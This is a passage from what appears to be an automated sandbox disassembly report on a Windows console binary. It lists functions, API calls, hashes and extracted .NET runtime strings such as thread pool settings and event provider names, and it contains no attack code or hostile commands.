                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CBDD
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CBF1
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CC06
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CC26
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CC3A
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CC4F
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CC6F
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CC83
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CC98
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CCB8
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CCCC
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CCE1
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CD01
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CD15
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CD2A
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CD58
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CD6C
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CD81
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CDA1
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CDB5
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CDCA
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CDEA
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CDFE
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CE13
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CE6E
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CE82
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CE97
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite_swprintfstrlen
                                                                                                                                                                                                                          • String ID: %-30s %d$%-30s %zu$cache_load:%zu used, %zu total, utilization %#5.2f%%$stub data$cache_entry_counter$cache_entry_space$cache_entry_used$site_counter$site_write$site_write_mono$site_write_poly$stub_lookup_counter$stub_mono_counter$stub_poly_counter$stub_space
                                                                                                                                                                                                                          • API String ID: 1354552572-2971453786
                                                                                                                                                                                                                          • Opcode ID: f7d243bafac8af75b7784f64c1fb35537d8a2414da801e393f3b7bb8abc7e660
                                                                                                                                                                                                                          • Instruction ID: 39cef180e41fb53114e2c9f8bdd2da49414ef9eb550ca4d12e16b0ef5696fc8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7d243bafac8af75b7784f64c1fb35537d8a2414da801e393f3b7bb8abc7e660
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F149B2504308AFD710CF58DC4AF8B77A8FB08705F04457EF64ADA252E772A929CB52
                                                                                                                                                                                                                          Function 010BD8C0 Relevance: 37.1, APIs: 2, Strings: 19, Instructions: 373COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0163EF10,7CAB6A82,?,?,0000002C), ref: 010BD946
                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 010BD981
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.WavePeriod, xrefs: 010BDABF
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.SampleIntervalHigh, xrefs: 010BDC61
                                                                                                                                                                                                                          • System.Threading.ThreadPool.MaxThreads, xrefs: 010BDA01
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.WaveMagnitudeMultiplier, xrefs: 010BDB31
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.TargetSignalToNoiseRatio, xrefs: 010BDAE5
                                                                                                                                                                                                                          • System.Threading.ThreadPool.DisableStarvationDetection, xrefs: 010BDA27
                                                                                                                                                                                                                          • System.Threading.ThreadPool.DebugBreakOnWorkerStarvation, xrefs: 010BDA4D
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.Disable, xrefs: 010BDA99
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.MaxSampleErrorPercent, xrefs: 010BDC15
                                                                                                                                                                                                                          • System.Threading.ThreadPool.UnfairSemaphoreSpinLimit, xrefs: 010BDA73
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.MaxWaveMagnitude, xrefs: 010BDB57
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.MaxChangePerSecond, xrefs: 010BDBC9
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.WaveHistorySize, xrefs: 010BDB7D
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.Bias, xrefs: 010BDBA3
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.SampleIntervalLow, xrefs: 010BDC3B
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.MaxChangePerSample, xrefs: 010BDBEF
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.GainExponent, xrefs: 010BDC87
                                                                                                                                                                                                                          • System.Threading.ThreadPool.HillClimbing.ErrorSmoothingFactor, xrefs: 010BDB0B
                                                                                                                                                                                                                          • System.Threading.ThreadPool.MinThreads, xrefs: 010BD9DB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                          • String ID: System.Threading.ThreadPool.DebugBreakOnWorkerStarvation$System.Threading.ThreadPool.DisableStarvationDetection$System.Threading.ThreadPool.HillClimbing.Bias$System.Threading.ThreadPool.HillClimbing.Disable$System.Threading.ThreadPool.HillClimbing.ErrorSmoothingFactor$System.Threading.ThreadPool.HillClimbing.GainExponent$System.Threading.ThreadPool.HillClimbing.MaxChangePerSample$System.Threading.ThreadPool.HillClimbing.MaxChangePerSecond$System.Threading.ThreadPool.HillClimbing.MaxSampleErrorPercent$System.Threading.ThreadPool.HillClimbing.MaxWaveMagnitude$System.Threading.ThreadPool.HillClimbing.SampleIntervalHigh$System.Threading.ThreadPool.HillClimbing.SampleIntervalLow$System.Threading.ThreadPool.HillClimbing.TargetSignalToNoiseRatio$System.Threading.ThreadPool.HillClimbing.WaveHistorySize$System.Threading.ThreadPool.HillClimbing.WaveMagnitudeMultiplier$System.Threading.ThreadPool.HillClimbing.WavePeriod$System.Threading.ThreadPool.MaxThreads$System.Threading.ThreadPool.MinThreads$System.Threading.ThreadPool.UnfairSemaphoreSpinLimit
                                                                                                                                                                                                                          • API String ID: 3094578987-3657790599
                                                                                                                                                                                                                          • Opcode ID: 1a84b781b15898e48cd8eefa026b1830c0edac1e9d7fbf27b5df86902f49a325
                                                                                                                                                                                                                          • Instruction ID: 976ee69b63416014de597b5babc199e80968668caddeebfdb84ab0f01b2675f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a84b781b15898e48cd8eefa026b1830c0edac1e9d7fbf27b5df86902f49a325
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08A1C83279020956D760EE8AFC81BE8F760FBA1725F5042BAFAD4AF2C0D7725516C790
                                                                                                                                                                                                                          Function 010746E0 Relevance: 31.6, APIs: 3, Strings: 15, Instructions: 145stringmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,01074E71,0159CDF8,?,00000100,?,?), ref: 010746EA
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000100,?,?), ref: 01074741
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000100,?,?,?,00000100,?,?), ref: 01074763
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeapstrcpy_sstrlen
                                                                                                                                                                                                                          • String ID: **UNKNOWN TYPE**$Boolean$Byte$Char$Double$Int16$Int32$Int64$SByte$Single$System.String$UInt16$UInt32$UInt64$Void
                                                                                                                                                                                                                          • API String ID: 2476811093-2821386802
                                                                                                                                                                                                                          • Opcode ID: 8c13a29e3c1981e9b0e897f8cb60049a7fbcb48b439df3b14bdf6504f5893e0c
                                                                                                                                                                                                                          • Instruction ID: 3a3682576f26f5d4b5b02a4431fe2df210debb66791ac7fc1138429dbc9b61bb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c13a29e3c1981e9b0e897f8cb60049a7fbcb48b439df3b14bdf6504f5893e0c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7241A271E00209EBDB14DF55DC829BDF7A4FB45600F50466AEAD6E7210FB70AE20CB96
                                                                                                                                                                                                                          Function 012CE090 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 266stringmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,00000010,00000000,?,00000000), ref: 012CE186
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012CE195
                                                                                                                                                                                                                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A,00000000,?,00000000), ref: 012CE1CF
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012CE1DC
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,00000000,00000000,?,00000000), ref: 012CE21F
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,012CDEB4,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 012CE2AA
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,012CDEB4,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 012CE2BB
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,012CDEB4,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 012CE2D7
                                                                                                                                                                                                                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntime,00000000,?,00000000), ref: 012CE326
                                                                                                                                                                                                                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimePrivate,C14FCCBD,00000004,00000005,00000000), ref: 012CE348
                                                                                                                                                                                                                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-DotNETCore-SampleProfiler,4002000B,00000000,00000005,00000000), ref: 012CE36B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Microsoft-DotNETCore-SampleProfiler, xrefs: 012CE366
                                                                                                                                                                                                                          • Microsoft-Windows-DotNETRuntimeRundown, xrefs: 012CE21A
                                                                                                                                                                                                                          • Microsoft-Windows-DotNETRuntime, xrefs: 012CE321
                                                                                                                                                                                                                          • Microsoft-Windows-DotNETRuntimePrivate, xrefs: 012CE343
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$_strdup$FreeHeapstrcmpstrtoulstrtoull
                                                                                                                                                                                                                          • String ID: Microsoft-DotNETCore-SampleProfiler$Microsoft-Windows-DotNETRuntime$Microsoft-Windows-DotNETRuntimePrivate$Microsoft-Windows-DotNETRuntimeRundown
                                                                                                                                                                                                                          • API String ID: 1615690062-209705412
                                                                                                                                                                                                                          • Opcode ID: 18e13fd0bdb3b2e74c12eb946b985f76e2ca1ea6e56853b4e05ed191f4624d4c
                                                                                                                                                                                                                          • Instruction ID: cd0c13341c862271269fa0ba60c40d68d42ead92c33a20777bb5653660d73b4b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18e13fd0bdb3b2e74c12eb946b985f76e2ca1ea6e56853b4e05ed191f4624d4c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C91AE70E102169FEB20CFA8DC45BAEBFB1AF45B10F15026DEB51BB391D7B099118B91
                                                                                                                                                                                                                          Function 01252500 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 94pipeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,Function_00317170,?,?,01252334,Function_00317170), ref: 01252519
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,01252334,Function_00317170), ref: 01252534
                                                                                                                                                                                                                          • DisconnectNamedPipe.KERNEL32(?,00000000,Function_00317170,?,?,01252334,Function_00317170), ref: 01252583
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,01252334,Function_00317170), ref: 01252592
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,Function_00317170,?,?,01252334,Function_00317170), ref: 012525AE
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,01252334,Function_00317170), ref: 012525BD
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,Function_00317170,?,?,01252334,Function_00317170), ref: 012525E9
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,01252334,Function_00317170), ref: 012525F8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Closing without cleaning underlying handles, xrefs: 01252558
                                                                                                                                                                                                                          • Failed to disconnect NamedPipe, xrefs: 01252599
                                                                                                                                                                                                                          • Failed to IPC ownership sentinel handle, xrefs: 0125253B
                                                                                                                                                                                                                          • Failed to close pipe handle, xrefs: 012525C4
                                                                                                                                                                                                                          • Failed to close overlap event handle, xrefs: 012525FF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CloseHandle$DisconnectNamedPipe
                                                                                                                                                                                                                          • String ID: Closing without cleaning underlying handles$Failed to IPC ownership sentinel handle$Failed to close overlap event handle$Failed to close pipe handle$Failed to disconnect NamedPipe
                                                                                                                                                                                                                          • API String ID: 3346832071-3329839343
                                                                                                                                                                                                                          • Opcode ID: fbd3b932134b12ecc9a4ceb8c8dc5438960a6b5a4d0fa37ee2d6d2735065a1b7
                                                                                                                                                                                                                          • Instruction ID: cb36f431114305e79abeb619618bf1b929213421011b6a7c647700ba7389d74b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbd3b932134b12ecc9a4ceb8c8dc5438960a6b5a4d0fa37ee2d6d2735065a1b7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B31B071601712EBD32C1B6DE89C6E9BB14FB00726F110309FB26E62F4CB7198618BE1
                                                                                                                                                                                                                          Function 012D2AC0 Relevance: 21.4, APIs: 14, Instructions: 350memorytimeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 012D2B08
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000070,00000000,00000000,00000000), ref: 012D2B20
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 012D2BAD
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,000000F0), ref: 012D2BCD
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00019000,?), ref: 012D2C2D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012D2C43
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00019000,?), ref: 012D2C8F
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,000000F0,?,00019000,?), ref: 012D2CB6
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00019000,?), ref: 012D2D70
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,0000002C,?,?,?,?,?,?,?,?,?,?,00019000,?), ref: 012D2D88
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 012D2E42
                                                                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 012D2E97
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 012D2EC4
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 012D2EE3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Process$Alloc$FreeSystem$AllocateCurrentFrequencyInfoPerformanceQueryTime
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3274788086-0
                                                                                                                                                                                                                          • Opcode ID: 4f7d43d35e5f47808939e85e7f44a308da3dea3d52ee766e8a145053699ea6d0
                                                                                                                                                                                                                          • Instruction ID: 3da719262d81213d09226ca92fcffac599869f424bc359d6ba177e0539625ab8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f7d43d35e5f47808939e85e7f44a308da3dea3d52ee766e8a145053699ea6d0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9D1AEB0A10742EFE721DF69C94476ABBF4BF18701F00452DEA46AB790EBB4E454CB90
                                                                                                                                                                                                                          Function 012D2480 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 160memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,CommandLine,000000FF,00000000,00000000,00000000,00000000,00000004,00000000), ref: 012D24C0
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012CE6D8), ref: 012D24D0
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,CommandLine,000000FF,00000000,?), ref: 012D24F0
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,012CE6D8), ref: 012D24FB
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,012CE6D8,00000004,00000000), ref: 012D260A
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,012CE6D8), ref: 012D2618
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,012CE6D8), ref: 012D2626
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,012CE6D8), ref: 012D2637
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,012CE6D8), ref: 012D2645
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
